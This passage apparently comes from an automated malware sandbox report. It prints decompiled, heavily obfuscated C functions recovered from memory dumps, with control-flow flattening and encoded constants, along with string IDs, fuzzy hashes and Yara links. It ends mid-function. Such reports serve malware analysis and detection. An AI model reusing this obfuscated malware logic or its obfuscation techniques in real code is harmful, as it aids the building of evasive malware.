                                          0x006cbb14
                                          0x006cbb1c
                                          0x006cbb1c
                                          0x006cbb1f
                                          0x00000000
                                          0x006cbb29
                                          0x006cbb29
                                          0x006cbb29
                                          0x00000000
                                          0x006cbb35

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
                                          • API String ID: 0-1090126677
                                          • Opcode ID: e3b194516a1ecc5a220053c3b3a457a6f8da7e5a808730658090ff83b325bff4
                                          • Instruction ID: 14d7f34ffcbab332ab51130baf4079e5aa2b8f3b4fcd622b4883ded2b4cd9a33
                                          • Opcode Fuzzy Hash: e3b194516a1ecc5a220053c3b3a457a6f8da7e5a808730658090ff83b325bff4
                                          • Instruction Fuzzy Hash: 9DA122B15093809BE358CF64D98A91BBBE2FBC4B58F10591DF185862A0D7B9CA49CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CEA4C, Relevance: 10.2, Strings: 8, Instructions: 203COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006CEA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006C602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E006C8736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E006D59A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E006D59A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}






































                                          0x006cea50
                                          0x006cea57
                                          0x006cea5b
                                          0x006cea5d
                                          0x006cea5e
                                          0x006cea62
                                          0x006cea66
                                          0x006cea68
                                          0x006cea6d
                                          0x006cea75
                                          0x006cea77
                                          0x006cea7b
                                          0x006cea7e
                                          0x006cea88
                                          0x006cea90
                                          0x006cea95
                                          0x006cea9a
                                          0x006ceaa2
                                          0x006ceaaa
                                          0x006ceab2
                                          0x006ceab7
                                          0x006ceac6
                                          0x006ceac9
                                          0x006ceacd
                                          0x006cead5
                                          0x006ceadd
                                          0x006ceae2
                                          0x006ceaea
                                          0x006ceaf2
                                          0x006ceafa
                                          0x006ceb0a
                                          0x006ceb0e
                                          0x006ceb16
                                          0x006ceb1e
                                          0x006ceb22
                                          0x006ceb27
                                          0x006ceb2f
                                          0x006ceb37
                                          0x006ceb3f
                                          0x006ceb4c
                                          0x006ceb4d
                                          0x006ceb51
                                          0x006ceb59
                                          0x006ceb61
                                          0x006ceb6f
                                          0x006ceb73
                                          0x006ceb7b
                                          0x006ceb88
                                          0x006ceb8c
                                          0x006ceb94
                                          0x006ceb9c
                                          0x006ceba4
                                          0x006cebb1
                                          0x006cebb5
                                          0x006cebbd
                                          0x006cebc5
                                          0x006cebcd
                                          0x006cebd5
                                          0x006cebe2
                                          0x006cebe6
                                          0x006cebee
                                          0x006cebf6
                                          0x006cebfe
                                          0x006cec06
                                          0x006cec10
                                          0x006cec15
                                          0x006cec1d
                                          0x006cec25
                                          0x006cec2d
                                          0x006cec35
                                          0x006cec3a
                                          0x006cec42
                                          0x006cec50
                                          0x006cec55
                                          0x006cec5b
                                          0x006cec60
                                          0x006cec68
                                          0x006cec70
                                          0x006cec78
                                          0x006cec84
                                          0x006cec89
                                          0x006cec8f
                                          0x006cec97
                                          0x006ceca3
                                          0x006ceca8
                                          0x006cecae
                                          0x006cecb6
                                          0x006cecbe
                                          0x006cecca
                                          0x006ceccf
                                          0x006cecd9
                                          0x006cece1
                                          0x006cecea
                                          0x006cecee
                                          0x006cecf6
                                          0x006cecf6
                                          0x006ced04
                                          0x006ced65
                                          0x006ced66
                                          0x006ced70
                                          0x006ced76
                                          0x006ced78
                                          0x00000000
                                          0x006ced78
                                          0x006ced06
                                          0x006ced0c
                                          0x006ced46
                                          0x006ced4b
                                          0x006ced50
                                          0x006ced52
                                          0x00000000
                                          0x006ced52
                                          0x006ced0e
                                          0x006ced14
                                          0x00000000
                                          0x006ced1a
                                          0x006ced1a
                                          0x00000000
                                          0x006ced1a
                                          0x006ced14
                                          0x006ced0c
                                          0x00000000
                                          0x006ced04
                                          0x006ceda3
                                          0x006cedaf
                                          0x006cedb2
                                          0x006cedb4
                                          0x006cedb9
                                          0x006cedb9
                                          0x006cedc6
                                          0x006cedce

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: n$)?$9v$<q7$dR$--0$--0$T8T
                                          • API String ID: 0-1820671589
                                          • Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                          • Instruction ID: 7bdf02b1e02663e17eeecba04bbdf26f2490c891eeda8113fcca29fce961b1e4
                                          • Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                          • Instruction Fuzzy Hash: 9D9142714093419BD368CF61C98992FFBF1FBC5B58F405A1DF2969A260C3B68A058F46
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006DA0AF, Relevance: 9.0, Strings: 7, Instructions: 283COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006DA0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t237;
				void* _t251;
				void* _t256;
				short _t257;
				void* _t258;
				void* _t262;
				signed int _t268;
				signed int _t269;
				void* _t271;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				intOrPtr _t319;
				signed int _t320;
				signed int _t323;
				signed int* _t325;
				void* _t327;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t237);
				_v8 = _v8 & 0x00000000;
				_t325 =  &(( &_v108)[4]);
				_v36 = 0x3ea4;
				_v36 = _v36 >> 7;
				_t271 = 0x1d995f52;
				_v36 = _v36 ^ 0x0000fd94;
				_v100 = 0xb5d8;
				_t313 = 0x12;
				_v100 = _v100 / _t313;
				_v100 = _v100 + 0xffffd667;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xffc12715;
				_v44 = 0xa7b5;
				_v44 = _v44 + 0x5ef4;
				_v44 = _v44 ^ 0x00014b95;
				_v48 = 0x9389;
				_v48 = _v48 + 0xb0ba;
				_v48 = _v48 ^ 0x000118ce;
				_v88 = 0x5fea;
				_t314 = 0x1c;
				_v88 = _v88 * 0x7c;
				_v88 = _v88 ^ 0x636ec63e;
				_v88 = _v88 ^ 0x63409d32;
				_v16 = 0x76ea;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x000ec3ec;
				_v20 = 0x91aa;
				_v20 = _v20 | 0x0edf39e6;
				_v20 = _v20 ^ 0x0edfdf8b;
				_v52 = 0xaa70;
				_v52 = _v52 + 0x8ed4;
				_v52 = _v52 ^ 0x00017b8d;
				_v104 = 0xa114;
				_v104 = _v104 >> 5;
				_v104 = _v104 << 0xc;
				_v104 = _v104 / _t314;
				_v104 = _v104 ^ 0x0002b555;
				_v108 = 0xd093;
				_v108 = _v108 << 0xa;
				_t315 = 0x69;
				_v108 = _v108 * 0x4a;
				_v108 = _v108 / _t315;
				_v108 = _v108 ^ 0x024bf4a9;
				_v80 = 0x5298;
				_v80 = _v80 | 0xf2bddfef;
				_v80 = _v80 ^ 0xf2bdee35;
				_v84 = 0xad61;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x5376a172;
				_v84 = _v84 ^ 0x535d9bb3;
				_v96 = 0xfad4;
				_v96 = _v96 + 0xc0fb;
				_t316 = 0x75;
				_v96 = _v96 / _t316;
				_t317 = 0x41;
				_t323 = _a8;
				_v96 = _v96 / _t317;
				_v96 = _v96 ^ 0x00007e63;
				_v40 = 0x6cc;
				_v40 = _v40 + 0x5321;
				_v40 = _v40 ^ 0x00002fe7;
				_v76 = 0xe38c;
				_v76 = _v76 + 0x66b4;
				_v76 = _v76 >> 5;
				_v76 = _v76 ^ 0x00001a53;
				_v68 = 0xaffd;
				_v68 = _v68 + 0x9b0e;
				_v68 = _v68 ^ 0x74692a2f;
				_v68 = _v68 ^ 0x74685d67;
				_v92 = 0xd493;
				_v92 = _v92 >> 5;
				_v92 = _v92 + 0xffffb819;
				_v92 = _v92 << 3;
				_v92 = _v92 ^ 0xfffdea97;
				_v32 = 0x61b7;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00001b97;
				_v72 = 0x8555;
				_v72 = _v72 >> 6;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x00005e98;
				_v64 = 0xfd5d;
				_v64 = _v64 ^ 0xfb760f92;
				_v64 = _v64 + 0xe44c;
				_v64 = _v64 ^ 0xfb77c0e2;
				_v24 = 0xfd78;
				_v24 = _v24 ^ 0x534e19f9;
				_v24 = _v24 ^ 0x534eb204;
				_v28 = 0xae38;
				_v28 = _v28 ^ 0x0fcca386;
				_v28 = _v28 ^ 0x0fcc33c1;
				_t268 = _a8;
				_v56 = 0x9a6f;
				_v56 = _v56 | 0xcfdc8d68;
				_v56 = _v56 ^ 0xf237fb5d;
				_v56 = _v56 ^ 0x3deb56e2;
				_v12 = 0xde50;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x0de56132;
				_v60 = 0x8399;
				_v60 = _v60 ^ 0x95508e48;
				_v60 = _v60 ^ 0xc724022f;
				_v60 = _v60 ^ 0x52742192;
				while(1) {
					L1:
					_t251 = 0x10ef006b;
					do {
						while(1) {
							L2:
							_t327 = _t271 - 0x1d995f52;
							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E006CF536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E006C6636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E006D0ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E006D5A61( &_v8, E006D8D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E006C8736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E006D0ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E006CF536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E006D5D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}





















































                                          0x006da0bd
                                          0x006da0be
                                          0x006da0c5
                                          0x006da0c6
                                          0x006da0c7
                                          0x006da0cc
                                          0x006da0d4
                                          0x006da0d7
                                          0x006da0e1
                                          0x006da0e6
                                          0x006da0eb
                                          0x006da0f3
                                          0x006da101
                                          0x006da106
                                          0x006da10c
                                          0x006da114
                                          0x006da119
                                          0x006da121
                                          0x006da129
                                          0x006da131
                                          0x006da139
                                          0x006da141
                                          0x006da149
                                          0x006da151
                                          0x006da15e
                                          0x006da161
                                          0x006da165
                                          0x006da16d
                                          0x006da175
                                          0x006da17d
                                          0x006da182
                                          0x006da18a
                                          0x006da192
                                          0x006da19a
                                          0x006da1a2
                                          0x006da1aa
                                          0x006da1b2
                                          0x006da1ba
                                          0x006da1c2
                                          0x006da1c7
                                          0x006da1d4
                                          0x006da1d8
                                          0x006da1e0
                                          0x006da1e8
                                          0x006da1f2
                                          0x006da1f5
                                          0x006da201
                                          0x006da205
                                          0x006da20d
                                          0x006da215
                                          0x006da21d
                                          0x006da225
                                          0x006da22d
                                          0x006da232
                                          0x006da23a
                                          0x006da242
                                          0x006da24a
                                          0x006da256
                                          0x006da259
                                          0x006da265
                                          0x006da268
                                          0x006da26f
                                          0x006da273
                                          0x006da27b
                                          0x006da283
                                          0x006da28b
                                          0x006da293
                                          0x006da29b
                                          0x006da2a3
                                          0x006da2a8
                                          0x006da2b0
                                          0x006da2b8
                                          0x006da2c0
                                          0x006da2c8
                                          0x006da2d0
                                          0x006da2d8
                                          0x006da2dd
                                          0x006da2e5
                                          0x006da2ea
                                          0x006da2f2
                                          0x006da2fa
                                          0x006da2ff
                                          0x006da307
                                          0x006da30f
                                          0x006da314
                                          0x006da319
                                          0x006da321
                                          0x006da329
                                          0x006da331
                                          0x006da339
                                          0x006da341
                                          0x006da349
                                          0x006da351
                                          0x006da359
                                          0x006da361
                                          0x006da369
                                          0x006da371
                                          0x006da37c
                                          0x006da384
                                          0x006da38c
                                          0x006da394
                                          0x006da39c
                                          0x006da3a4
                                          0x006da3a9
                                          0x006da3b1
                                          0x006da3b9
                                          0x006da3c1
                                          0x006da3c9
                                          0x006da3d1
                                          0x006da3d1
                                          0x006da3d1
                                          0x006da3d6
                                          0x006da3d6
                                          0x006da3d6
                                          0x006da3d6
                                          0x006da3dc
                                          0x00000000
                                          0x00000000
                                          0x006da3e2
                                          0x006da4cb
                                          0x00000000
                                          0x006da3e8
                                          0x006da3ee
                                          0x006da592
                                          0x006da598
                                          0x006da59a
                                          0x006da59a
                                          0x006da5ad
                                          0x006da5b2
                                          0x006da5b6
                                          0x006da59a
                                          0x006da3f4
                                          0x006da3f6
                                          0x006da462
                                          0x006da466
                                          0x006da46a
                                          0x006da46c
                                          0x006da485
                                          0x006da494
                                          0x006da499
                                          0x006da49c
                                          0x006da4a0
                                          0x006da4a1
                                          0x006da4a6
                                          0x006da4a7
                                          0x006da4ad
                                          0x006da4b1
                                          0x006da4b1
                                          0x006da4b6
                                          0x006da4ba
                                          0x006da4bf
                                          0x00000000
                                          0x006da3f8
                                          0x006da3fe
                                          0x006da450
                                          0x006da455
                                          0x006da458
                                          0x006da3d1
                                          0x006da3d1
                                          0x006da3d1
                                          0x00000000
                                          0x006da3d1
                                          0x006da400
                                          0x006da406
                                          0x00000000
                                          0x006da40c
                                          0x006da418
                                          0x006da419
                                          0x006da423
                                          0x006da425
                                          0x006da432
                                          0x00000000
                                          0x006da432
                                          0x006da406
                                          0x006da3fe
                                          0x006da3f6
                                          0x006da3ee
                                          0x006da5ba
                                          0x006da5cf
                                          0x006da5cf
                                          0x006da4db
                                          0x006da543
                                          0x006da547
                                          0x006da549
                                          0x006da54f
                                          0x006da551
                                          0x006da55c
                                          0x006da561
                                          0x006da568
                                          0x006da56b
                                          0x006da56f
                                          0x006da573
                                          0x006da573
                                          0x006da578
                                          0x006da57f
                                          0x00000000
                                          0x006da4dd
                                          0x006da4e3
                                          0x006da532
                                          0x006da539
                                          0x00000000
                                          0x006da4e5
                                          0x006da4eb
                                          0x00000000
                                          0x006da4f1
                                          0x006da4f1
                                          0x006da4f4
                                          0x006da511
                                          0x006da516
                                          0x006da519
                                          0x006da51b
                                          0x006da3d1
                                          0x006da3d1
                                          0x006da3d1
                                          0x00000000
                                          0x006da3d1
                                          0x006da3d1
                                          0x006da4eb
                                          0x006da4e3
                                          0x00000000
                                          0x006da584
                                          0x006da584
                                          0x00000000
                                          0x006da590

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 2a$L$c~$g]ht$/$V=$_
                                          • API String ID: 0-445983283
                                          • Opcode ID: 0d4faabd9a9341c50fb55503336c1c558b5e58b03c0d629d0468315073e1cc07
                                          • Instruction ID: 2bce74e8d6bfedb876b19f8d4dcc3ae17f8047c0c07a690a568261e96bc84059
                                          • Opcode Fuzzy Hash: 0d4faabd9a9341c50fb55503336c1c558b5e58b03c0d629d0468315073e1cc07
                                          • Instruction Fuzzy Hash: E6D1647290C7418FD368CF61D48995BBBE2FBC4718F60890DF596862A0C7B49909CF83
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D7F1F, Relevance: 9.0, Strings: 7, Instructions: 237COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D7F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E006D7F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E006CD64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E006D7F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E006D7F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E006CD64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E006D7F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E006CD64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E006D7F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
